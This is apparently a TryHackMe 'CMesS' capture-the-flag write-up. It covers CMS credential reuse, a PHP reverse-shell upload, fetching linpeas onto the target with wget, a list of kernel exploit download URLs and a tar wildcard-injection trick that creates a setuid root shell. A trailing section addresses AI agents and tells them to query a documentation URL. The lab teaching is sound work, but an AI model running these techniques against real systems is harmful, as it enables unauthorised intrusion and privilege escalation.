# TryHackMe - CMesS * [Room](https://tryhackme.com/room/cmess) ## Nmap ```bash ┌──(root💀kali)-[~] └─# nmap -T4 -sC -sV -O -Pn -p- 10.10.125.143 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 12:09 EDT Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 0.20% done Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 0.26% done Nmap scan report for cmess.thm (10.10.125.143) Host is up (0.27s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA) | 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA) |_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: Gila CMS | http-robots.txt: 3 disallowed entries |_/src/ /themes/ /lib/ |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.18 (Ubuntu) Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (92%), Linux 3.0 - 3.2 (92%), Linux 3.0 - 3.5 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1289.07 seconds ``` ## Port 80 ![image](https://user-images.githubusercontent.com/96747355/176236230-0ba5c004-d17a-4a12-a78e-0ac29620f9ca.png) * When googling we find [this](https://www.cvedetails.com/cve/CVE-2020-5514/) (needs to be authenticated) * We have a robots.txt\ ![image](https://user-images.githubusercontent.com/96747355/176236371-39a429f6-3054-44b6-af45-396859476a4b.png) * With gobuster we found: /login and /admin * Let's look for subdomain `wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://cmess.thm' -H "HOST: FUZZ.cmess.thm" --hw 290` * We remove pages with 290 words because it is a not found response so not relevant for us even though the response code is 200. W find dev subdomain let's add it to /etc/hosts `10.10.125.143 dev.cmess.thm` * We find a few usernames and a username password combination! Let's try it! ![image](https://user-images.githubusercontent.com/96747355/176244503-a9fe3480-a4e1-4b7d-b3d0-8429c7099b10.png) * And it works!\ ![image](https://user-images.githubusercontent.com/96747355/176245591-17c1872a-77f9-424d-812e-df694ba131b9.png) * In the dashboard there is a feature called file manager. If we check out the config file we find a few interesting info including another password that we keep aside for later.\ ![image](https://user-images.githubusercontent.com/96747355/176247384-c2effae3-bac8-4dd5-ba47-31c7517ac477.png) * We can try the CVE previously found with google * let's follow this blog [post](https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-remote-code-execution/) * \=> NOT WORKING * What's working though is to use the feature to download a php reverse shell this way we get a shell. Our file goes in the asset folder\ ![image](https://user-images.githubusercontent.com/96747355/176249759-aed47f3b-5cc1-4e3b-a6fd-cf55e9b88176.png) * Then we just need to access to the url `http://cmess.thm/assets/php-reverse-shell.php` and we get our shell\ ![image](https://user-images.githubusercontent.com/96747355/176250190-a5a5c620-0ec1-45cf-8574-327d18be0275.png) * We stabilize our shell `python3 -c 'import pty; pty.spawn("/bin/bash")'` * Lets get a privesc enum script in our target. I am a fan of linpeas so I am gonna use it here. * `wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh` * `python3 -m http.server 80` * And from our target we type `wget http://10.13.22.56/linpeas.sh` (we need to be in the tmp folder to successfully write the file) * We make it executable `chmod +x linpeas.sh` and we launch it `./linpeas.sh` ## Lateral movement ## Interesting output from linpeas * [Kernel exploits](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits)\ ![image](https://user-images.githubusercontent.com/96747355/176254540-808b1e35-3040-47c3-b075-2f6e1b0c6fb9.png) * [Sudo version](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version) ![image](https://user-images.githubusercontent.com/96747355/176254372-dc5e27df-f5c4-4f5b-a076-75771f4b478c.png) * List of cve we could try out ``` [+] [CVE-2017-16995] eBPF_verifier [+] [CVE-2016-5195] dirtycow [+] [CVE-2016-5195] dirtycow 2 [+] [CVE-2021-3156] sudo Baron Samedit 2 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2017-7308] af_packet Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c [+] [CVE-2017-6074] dccp [+] [CVE-2017-1000112] NETIF_F_UFO Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c [+] [CVE-2016-8655] chocobo_root [+] [CVE-2016-4557] double-fdput() [+] [CVE-2021-3156] sudo Baron Samedit Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-22555] Netfilter heap out-of-bounds write ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ [+] [CVE-2019-15666] XFRM_UAF [+] [CVE-2018-1000001] RationalLove [+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64 [+] [CVE-2017-1000253] PIE_stack_corruption [+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c [+] [CVE-2016-2384] usb-midi Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c [+] [CVE-2016-0728] keyring CVE-2016-8655 CVE-2018-14665 CVE-2017-16695 ``` * other interesting things to check ``` /etc/cron.d: -rw-r--r-- 1 root root 191 Feb 6 2020 popularity-contest */2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz * tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - -rw------- 1 root root 317 Feb 6 2020 /etc/mysql/debian.cnf drwxr-xr-x 2 root root 4096 Feb 6 2020 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Feb 6 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf /usr/share/doc/openssh-client/examples/sshd_config /opt/.password.bak ``` * The sudo version is not successful cause our version does not seem vulnerable. * Let's check this file `/opt/.password.bak`\ ![image](https://user-images.githubusercontent.com/96747355/176259230-96bf43f5-7bd2-4b84-b7f8-50b34028b1d9.png) * We have another password * Let's try it if we su andre it works! let's ssh as andre\ ![image](https://user-images.githubusercontent.com/96747355/176259522-58a59463-1c0c-474e-b8d7-b082ec8e0329.png) * Let's grab the user flag\ ![image](https://user-images.githubusercontent.com/96747355/176260214-7478952b-3cac-45e3-851f-db27f15fd50a.png) * Let's now enumerate way to privesc from Andre's user ## Privesc ### Linepeas as Andre * Our home is in the path. [Ressources for this on hacktricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses) ![image](https://user-images.githubusercontent.com/96747355/176260810-dfe4817a-5460-4895-b054-70cef795512b.png) This seems to be an interesting cron job\ ![image](https://user-images.githubusercontent.com/96747355/176261237-b9c710fc-e755-4164-b59f-d305cbb5d246.png) * This is doing a backup with a wildcard. We can try to abuse this. * Let's go to the backup folder * `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh` we create a malicious bash * `touch /home/andre/backup/--checkpoint=1` when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1 * `touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh` then this command is going to make and action when the checkpoint we created before is hit * Let's now try to launch our script `/tmp/bash -p` * It works!\ ![image](https://user-images.githubusercontent.com/96747355/176267325-6ea9c1b2-b09f-4688-8fdf-4c84b470ad62.png) * Let's grab the last flag\ ![image](https://user-images.githubusercontent.com/96747355/176267587-82e56ca1-047e-410c-a5c5-b2a11e87d342.png) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csbygb.gitbook.io/pentips/writeups/thmwriteups/thm-cmess.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.